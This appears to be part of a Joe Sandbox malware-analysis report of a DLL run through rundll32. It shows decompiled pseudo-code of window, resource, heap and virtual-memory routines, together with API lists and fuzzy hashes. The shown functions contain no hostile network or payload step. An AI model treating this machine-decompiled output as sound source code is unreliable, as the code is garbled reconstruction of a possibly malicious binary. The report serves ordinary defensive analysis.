                                                                        									 *(_t67 + 0xc) = 1;
                                                                        								}
                                                                        								_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                        								 *(_t67 + 0xc) = _t61;
                                                                        								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
                                                                        								 *(_t67 - 0x1c) = _t36;
                                                                        								__eflags = _t36;
                                                                        								if(_t36 != 0) {
                                                                        									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                        									 *(_t67 - 0x24) = _t38;
                                                                        									__eflags = _t38 - _t61;
                                                                        									if(_t38 >= _t61) {
                                                                        										_t38 = _t61;
                                                                        									}
                                                                        									E10011440( *(_t67 - 0x1c), _t59, _t38);
                                                                        									_push(_t59);
                                                                        									_push( *(_t67 - 0x20));
                                                                        									E10013BC6();
                                                                        									_t68 = _t68 + 0x14;
                                                                        								}
                                                                        							}
                                                                        							goto L21;
                                                                        							L27:
                                                                        							_t31 = E10014676(_t61);
                                                                        							__eflags = _t31;
                                                                        						} while (_t31 != 0);
                                                                        						goto L36;
                                                                        					} else {
                                                                        						_push(_t59);
                                                                        						E100107C8(0, _t59, _t61, __eflags);
                                                                        						L36:
                                                                        						_t28 = 0;
                                                                        						__eflags = 0;
                                                                        						goto L37;
                                                                        					}
                                                                        				} else {
                                                                        					_t28 = E100107B6( *(_t67 + 0xc));
                                                                        					L37:
                                                                        					return E1001254F(_t28);
                                                                        				}
                                                                        			}
















                                                                        0x100123f0
                                                                        0x100123f7
                                                                        0x100123fd
                                                                        0x10012402
                                                                        0x10012405
                                                                        0x10012406
                                                                        0x10012407
                                                                        0x1001240c
                                                                        0x1001240c
                                                                        0x100123d2
                                                                        0x100123d2
                                                                        0x100123d2
                                                                        0x100123d0
                                                                        0x1001240f
                                                                        0x10012412
                                                                        0x10012414
                                                                        0x10012416
                                                                        0x1001241a
                                                                        0x1001241a
                                                                        0x1001241b
                                                                        0x1001241b
                                                                        0x10012421
                                                                        0x10012424
                                                                        0x1001242f
                                                                        0x10012435
                                                                        0x10012438
                                                                        0x1001243a
                                                                        0x1001243f
                                                                        0x10012440
                                                                        0x10012443
                                                                        0x10012445
                                                                        0x10012447
                                                                        0x10012447
                                                                        0x1001244e
                                                                        0x10012453
                                                                        0x10012454
                                                                        0x10012457
                                                                        0x1001245c
                                                                        0x1001245c
                                                                        0x1001243a
                                                                        0x00000000
                                                                        0x1001249e
                                                                        0x1001249f
                                                                        0x100124a5
                                                                        0x100124a5
                                                                        0x00000000
                                                                        0x10012379
                                                                        0x10012379
                                                                        0x1001237a
                                                                        0x100124f4
                                                                        0x100124f4
                                                                        0x100124f4
                                                                        0x00000000
                                                                        0x100124f4
                                                                        0x10012364
                                                                        0x10012367
                                                                        0x100124f6
                                                                        0x100124fb
                                                                        0x100124fb

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                        • Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
                                                                        • Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                        • Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				intOrPtr _v16;
                                                                        				signed int _v20;
                                                                        				void* _t59;
                                                                        				signed int _t61;
                                                                        				signed int _t62;
                                                                        				void* _t64;
                                                                        				int* _t72;
                                                                        				struct HWND__* _t73;
                                                                        				intOrPtr _t78;
                                                                        				struct HRSRC__* _t81;
                                                                        				void* _t82;
                                                                        				void* _t86;
                                                                        				void* _t88;
                                                                        				void* _t89;
                                                                        				intOrPtr _t90;
                                                                        				void* _t93;
                                                                        				intOrPtr _t95;
                                                                        				intOrPtr _t101;
                                                                        				intOrPtr _t103;
                                                                        				struct HINSTANCE__* _t105;
                                                                        				intOrPtr* _t106;
                                                                        				void* _t107;
                                                                        
                                                                        				_t106 = __ecx;
                                                                        				_v8 = 0;
                                                                        				_v12 = 0;
                                                                        				if(_a8 != 0) {
                                                                        					_t105 =  *(E100373B5() + 0xc);
                                                                        					_t81 = FindResourceA(_t105, _a8, 0xf0);
                                                                        					if(_t81 != 0) {
                                                                        						_t82 = LoadResource(_t105, _t81);
                                                                        						_v12 = _t82;
                                                                        						if(_t82 == 0) {
                                                                        							return 0;
                                                                        						}
                                                                        						_v8 = LockResource(_t82);
                                                                        					}
                                                                        				}
                                                                        				__eflags = _v8;
                                                                        				_t86 = _a4;
                                                                        				_t103 = _a12;
                                                                        				_v16 = 1;
                                                                        				if(_v8 != 0) {
                                                                        					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
                                                                        					__eflags = _v12;
                                                                        					_v16 = _t78;
                                                                        					if(_v12 != 0) {
                                                                        						FreeResource(_v12);
                                                                        					}
                                                                        				}
                                                                        				_t59 =  *(_t86 + 0x48);
                                                                        				__eflags = _t59;
                                                                        				if(_t59 == 0) {
                                                                        					L25:
                                                                        					return _v16;
                                                                        				} else {
                                                                        					_t88 =  *(_t59 + 0x40);
                                                                        					_a8 = _a8 & 0x00000000;
                                                                        					__eflags = _t88;
                                                                        					_a4 = _t88;
                                                                        					_v12 = _t88;
                                                                        					if(_t88 != 0) {
                                                                        						_a8 =  *(E10006D96( &_a4));
                                                                        					}
                                                                        					_t61 = 0;
                                                                        					__eflags =  *(_t103 + 8);
                                                                        					_v8 = 0;
                                                                        					if( *(_t103 + 8) > 0) {
                                                                        						do {
                                                                        							_t89 = _a8;
                                                                        							__eflags = _t89;
                                                                        							if(_t89 == 0) {
                                                                        								L17:
                                                                        								_t90 =  *((intOrPtr*)(_t103 + 0xc));
                                                                        								_t62 = _t61 << 3;
                                                                        								__eflags =  *(_t62 + _t90);
                                                                        								_v20 = _t62;
                                                                        								if( *(_t62 + _t90) != 0) {
                                                                        									_t107 = E1001F77E(0xc);
                                                                        									__eflags = _t107;
                                                                        									if(_t107 == 0) {
                                                                        										_t107 = 0;
                                                                        										__eflags = 0;
                                                                        									} else {
                                                                        										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
                                                                        										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
                                                                        										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
                                                                        										 *(_t107 + 8) = _t72[1];
                                                                        										_t103 = _a12;
                                                                        										 *_t107 = _t73;
                                                                        									}
                                                                        									_t93 =  *(_t86 + 0x48) + 0x3c;
                                                                        									__eflags = _v12;
                                                                        									_push(_t107);
                                                                        									if(__eflags == 0) {
                                                                        										E1001E118(_t93, __eflags);
                                                                        									} else {
                                                                        										_push(_v12);
                                                                        										E1001DF55(_t93);
                                                                        									}
                                                                        								}
                                                                        								goto L24;
                                                                        							}
                                                                        							_t95 =  *((intOrPtr*)(_t89 + 4));
                                                                        							_t101 =  *((intOrPtr*)(_t103 + 0xc));
                                                                        							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
                                                                        							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
                                                                        								goto L17;
                                                                        							} else {
                                                                        								_t64 = _a4;
                                                                        								__eflags = _t64;
                                                                        								_v12 = _t64;
                                                                        								if(_t64 == 0) {
                                                                        									_a8 = _a8 & 0x00000000;
                                                                        								} else {
                                                                        									_a8 =  *(E10006D96( &_a4));
                                                                        								}
                                                                        							}
                                                                        							L24:
                                                                        							_t61 = _v8 + 1;
                                                                        							__eflags = _t61 -  *(_t103 + 8);
                                                                        							_v8 = _t61;
                                                                        						} while (_t61 <  *(_t103 + 8));
                                                                        					}
                                                                        					goto L25;
                                                                        				}
                                                                        			}




























                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 100071F4
                                                                        • LockResource.KERNEL32(00000000), ref: 10007209
                                                                        • FreeResource.KERNEL32(00000000), ref: 1000723C
                                                                        • GetDlgItem.USER32 ref: 100072E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeItemLoadLock
                                                                        • String ID:
                                                                        • API String ID: 996205394-0
                                                                        • Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                        • Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
                                                                        • Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                        • Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E10009B77(void* __ebx, void* __ecx) {
                                                                        				void* _t62;
                                                                        				long _t63;
                                                                        				void* _t76;
                                                                        
                                                                        				E10011BF0(0x1003ae2b, _t76);
                                                                        				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
                                                                        				if(_t62 > 0xf) {
                                                                        					L20:
                                                                        					_t63 = 0;
                                                                        				} else {
                                                                        					switch( *((intOrPtr*)(( *(_t62 + 0x10009d63) & 0x000000ff) * 4 +  &M10009D3B))) {
                                                                        						case 0:
                                                                        							__eax =  *(__ebp + 0x10);
                                                                        							 *__eax = 2;
                                                                        							 *(__eax + 8) = 1;
                                                                        							goto L19;
                                                                        						case 1:
                                                                        							_t65 =  *((intOrPtr*)(_t76 + 0x10));
                                                                        							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
                                                                        							 *_t65 = 0xb;
                                                                        							goto L19;
                                                                        						case 2:
                                                                        							__esi =  *(__ebp + 0x10);
                                                                        							__ecx =  *(__ebp + 8);
                                                                        							 *__esi = 0xb;
                                                                        							E1000A369( *(__ebp + 8)) =  ~__eax;
                                                                        							asm("sbb eax, eax");
                                                                        							 *(__esi + 8) = __ax;
                                                                        							goto L19;
                                                                        						case 3:
                                                                        							__eax =  *(__ebp + 0x10);
                                                                        							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
                                                                        							 *__eax = 0xb;
                                                                        							goto L19;
                                                                        						case 4:
                                                                        							__eax = E100243B2();
                                                                        							__edx =  *__eax;
                                                                        							__ecx = __eax;
                                                                        							__eax =  *((intOrPtr*)( *__eax + 0xc))();
                                                                        							 *(__ebp + 0xc) = __eax;
                                                                        							__ecx = __ebp + 0xc;
                                                                        							 *(__ebp - 4) = 1;
                                                                        							__eax = E10006A60(__ebp + 0xc, 0xf1c0);
                                                                        							__esi =  *(__ebp + 0x10);
                                                                        							__ecx = __ebp + 0xc;
                                                                        							 *__esi = 8;
                                                                        							__eax = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
                                                                        							__ecx =  *(__ebp + 0xc);
                                                                        							 *(__esi + 8) = __eax;
                                                                        							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
                                                                        							__eflags = __ecx;
                                                                        							goto L18;
                                                                        						case 5:
                                                                        							__esi =  *(__ebp + 0x10);
                                                                        							 *__esi = 3;
                                                                        							 *(__esi + 8) = GetThreadLocale();
                                                                        							goto L19;
                                                                        						case 6:
                                                                        							__eflags =  *(__esi + 0x58) - 0xffffffff;
                                                                        							if( *(__esi + 0x58) == 0xffffffff) {
                                                                        								_push( *(__esi + 0x1c));
                                                                        								__ecx = __ebp - 0x20;
                                                                        								E10029194(__ebp - 0x20) =  *(__esi + 0x1c);
                                                                        								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
                                                                        								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
                                                                        								__eax = GetTextColor( *(__ebp - 0x18));
                                                                        								__ecx = __ebp - 0x20;
                                                                        								 *(__esi + 0x5c) = __eax;
                                                                        								__eax = E100291EF(__ebp - 0x20, __eflags);
                                                                        							}
                                                                        							__eflags = __edi - 0xfffffd43;
                                                                        							__eax =  *(__ebp + 0x10);
                                                                        							 *__eax = 3;
                                                                        							if(__edi != 0xfffffd43) {
                                                                        								__esi =  *(__esi + 0x5c);
                                                                        							} else {
                                                                        								__esi =  *(__esi + 0x58);
                                                                        							}
                                                                        							 *(__eax + 8) = __esi;
                                                                        							goto L19;
                                                                        						case 7:
                                                                        							__eflags =  *(__esi + 0x60);
                                                                        							if( *(__esi + 0x60) != 0) {
                                                                        								L13:
                                                                        								__edi =  *(__ebp + 0x10);
                                                                        								 *__edi = 9;
                                                                        								__eax =  *(__esi + 0x60);
                                                                        								__ecx =  *__eax;
                                                                        								_push(__eax);
                                                                        								__eax =  *(__esi + 0x60);
                                                                        								 *(__edi + 8) =  *(__esi + 0x60);
                                                                        								goto L19;
                                                                        							} else {
                                                                        								__ecx =  *(__esi + 0x1c);
                                                                        								__eax = E100090C8( *(__esi + 0x1c));
                                                                        								__ecx = __esi;
                                                                        								__eax = E1000943B(__esi, __eax);
                                                                        								__eflags =  *(__esi + 0x60);
                                                                        								if( *(__esi + 0x60) == 0) {
                                                                        									goto L20;
                                                                        								} else {
                                                                        									goto L13;
                                                                        								}
                                                                        							}
                                                                        							goto L21;
                                                                        						case 8:
                                                                        							__eax = E100243B2();
                                                                        							__edx =  *__eax;
                                                                        							__ecx = __eax;
                                                                        							_t43 = __eax + 0x10; // 0x10
                                                                        							__esi = _t43;
                                                                        							 *(__ebp + 0xc) = __esi;
                                                                        							__edi =  *(__ebp + 0x10);
                                                                        							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                        							__ecx = __ebp + 0xc;
                                                                        							 *__edi = 8;
                                                                        							 *(__edi + 8) = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
                                                                        							_t50 = __esi - 0x10; // 0x0
                                                                        							__ecx = _t50;
                                                                        							L18:
                                                                        							__eax = E100014B0(__ecx, __edx);
                                                                        							L19:
                                                                        							_t63 = 1;
                                                                        							goto L21;
                                                                        						case 9:
                                                                        							goto L20;
                                                                        					}
                                                                        				}
                                                                        				L21:
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                                                                        				return _t63;
                                                                        			}







                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                        • String ID:
                                                                        • API String ID: 741590120-0
                                                                        • Opcode ID: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                        • Instruction ID: 17d43df59e13e7a0fc638ef54e749073bd167348119b36b57266e85b12fc2c17
                                                                        • Opcode Fuzzy Hash: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                        • Instruction Fuzzy Hash: D451543590074ADFEB20DF64C88499EB7F0FF08354F21895AE8569B3A1E774A981CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100344F5(void* __ecx, intOrPtr _a8) {
                                                                        				signed int _v7;
                                                                        				intOrPtr _v8;
                                                                        				struct tagRECT _v24;
                                                                        				void* _t44;
                                                                        				void* _t48;
                                                                        				void* _t52;
                                                                        				void* _t57;
                                                                        				void* _t64;
                                                                        				signed int _t67;
                                                                        				void* _t75;
                                                                        				void* _t76;
                                                                        				signed int _t78;
                                                                        
                                                                        				_t75 = __ecx;
                                                                        				_v8 = E100202AB(__ecx);
                                                                        				GetWindowRect( *(__ecx + 0x1c),  &_v24);
                                                                        				_t67 = GetSystemMetrics(0x21);
                                                                        				_t78 = GetSystemMetrics(0x20);
                                                                        				_t76 = E1002204B(_t75);
                                                                        				if((_v7 & 0x00000010) == 0) {
                                                                        					L5:
                                                                        					if(_t76 < 0xa || _t76 > 0x11) {
                                                                        						if(_t76 != 4) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L8;
                                                                        					} else {
                                                                        						L8:
                                                                        						if((_v7 & 0x00000008) == 0) {
                                                                        							InflateRect( &_v24,  ~_t78,  ~_t67);
                                                                        							if((_v7 & 0x00000002) == 0) {
                                                                        								L16:
                                                                        								return _t76;
                                                                        							}
                                                                        							_t44 = _t76 - 4;
                                                                        							if(_t44 == 0) {
                                                                        								L21:
                                                                        								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
                                                                        							}
                                                                        							_t48 = _t44 - 9;
                                                                        							if(_t48 == 0) {
                                                                        								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
                                                                        							}
                                                                        							_t52 = _t48 - 1;
                                                                        							if(_t52 == 0) {
                                                                        								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
                                                                        							}
                                                                        							_t57 = _t52;
                                                                        							if(_t57 == 0) {
                                                                        								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
                                                                        							}
                                                                        							if(_t57 == 1) {
                                                                        								goto L21;
                                                                        							}
                                                                        							goto L16;
                                                                        						}
                                                                        						_t64 = 2;
                                                                        						return _t64;
                                                                        					}
                                                                        				}
                                                                        				if(_t76 == 3) {
                                                                        					_t76 = 2;
                                                                        				}
                                                                        				if(GetKeyState(2) >= 0) {
                                                                        					goto L5;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetWindowRect.USER32 ref: 1003450F
                                                                        • GetSystemMetrics.USER32 ref: 1003451D
                                                                        • GetSystemMetrics.USER32 ref: 10034523
                                                                        • GetKeyState.USER32 ref: 10034540
                                                                        • InflateRect.USER32(?,00000000,00000000), ref: 10034573
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsRectSystemWindow$InflateLongState
                                                                        • String ID:
                                                                        • API String ID: 2406722796-0
                                                                        • Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                        • Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
                                                                        • Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                        • Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E10010839(void* __ecx, void* __eflags) {
                                                                        				void* _v8;
                                                                        				long _v12;
                                                                        				long _v16;
                                                                        				signed char _v23;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                        				struct _SYSTEM_INFO _v80;
                                                                        				void* _v92;
                                                                        				void* _t29;
                                                                        				int _t33;
                                                                        				intOrPtr _t35;
                                                                        				void* _t43;
                                                                        				void* _t46;
                                                                        				signed int _t49;
                                                                        				void* _t54;
                                                                        				void* _t55;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        
                                                                        				_t29 = 4;
                                                                        				E10010B20(_t29, __ecx);
                                                                        				_t55 = _t63;
                                                                        				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
                                                                        					L9:
                                                                        					_t33 = 0;
                                                                        				} else {
                                                                        					_t46 = _v44.AllocationBase;
                                                                        					GetSystemInfo( &_v80);
                                                                        					_t49 = _v80.dwPageSize;
                                                                        					_t35 =  *0x1004f3e0; // 0x2
                                                                        					_t54 = ( !(_t49 - 1) & _t55) - _t49;
                                                                        					asm("sbb esi, esi");
                                                                        					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
                                                                        					_v12 = _t49;
                                                                        					if(_t54 < _t62) {
                                                                        						goto L9;
                                                                        					} else {
                                                                        						if(_t35 == 1) {
                                                                        							_v8 = _t54;
                                                                        							goto L14;
                                                                        						} else {
                                                                        							_v8 = _t46;
                                                                        							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
                                                                        								_v8 = _v8 + _v44.RegionSize;
                                                                        								if((_v44.State & 0x00001000) == 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									_t43 = _v44.BaseAddress;
                                                                        									_v8 = _t43;
                                                                        									if((_v23 & 0x00000001) == 0) {
                                                                        										if(_t54 >= _t43) {
                                                                        											if(_t43 < _t62) {
                                                                        												_v8 = _t62;
                                                                        											}
                                                                        											VirtualAlloc(_v8, _v12, 0x1000, 4);
                                                                        											_t35 =  *0x1004f3e0; // 0x2
                                                                        											L14:
                                                                        											asm("sbb eax, eax");
                                                                        											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
                                                                        										} else {
                                                                        											goto L9;
                                                                        										}
                                                                        									} else {
                                                                        										_t33 = 1;
                                                                        									}
                                                                        								}
                                                                        								goto L15;
                                                                        							}
                                                                        							goto L9;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L15:
                                                                        				return _t33;
                                                                        			}





















                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                        • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
                                                                        • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                        • String ID:
                                                                        • API String ID: 4136887677-0
                                                                        • Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                        • Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
                                                                        • Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                        • Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                        				void* _t31;
                                                                        				signed int _t42;
                                                                        				struct HWND__* _t62;
                                                                        				void* _t64;
                                                                        				void* _t69;
                                                                        
                                                                        				_t69 = __eflags;
                                                                        				E10011BF0(0x1003a5dc, _t64);
                                                                        				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
                                                                        				E1001FFB4(_t64 - 0x38);
                                                                        				E10021613(_t64 - 0x88, _t69);
                                                                        				 *(_t64 - 4) = 0;
                                                                        				_t62 = GetTopWindow( *(__ecx + 0x1c));
                                                                        				if(_t62 != 0) {
                                                                        					do {
                                                                        						 *(_t64 - 0x6c) = _t62;
                                                                        						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
                                                                        						_push(_t62);
                                                                        						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
                                                                        						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
                                                                        							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
                                                                        								_t46 =  *((intOrPtr*)(_t64 + 0xc));
                                                                        								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                                                        									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
                                                                        										L11:
                                                                        										_t46 = 0;
                                                                        									} else {
                                                                        										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
                                                                        										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
                                                                        											goto L11;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
                                                                        							}
                                                                        						}
                                                                        						_t62 = GetWindow(_t62, 2);
                                                                        					} while (_t62 != 0);
                                                                        				}
                                                                        				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                                                        				 *(_t64 - 0x6c) = 0;
                                                                        				_t31 = E10022977(_t64 - 0x88);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
                                                                        				return _t31;
                                                                        			}









                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CtrlH_prologMessageSend
                                                                        • String ID:
                                                                        • API String ID: 4125289812-0
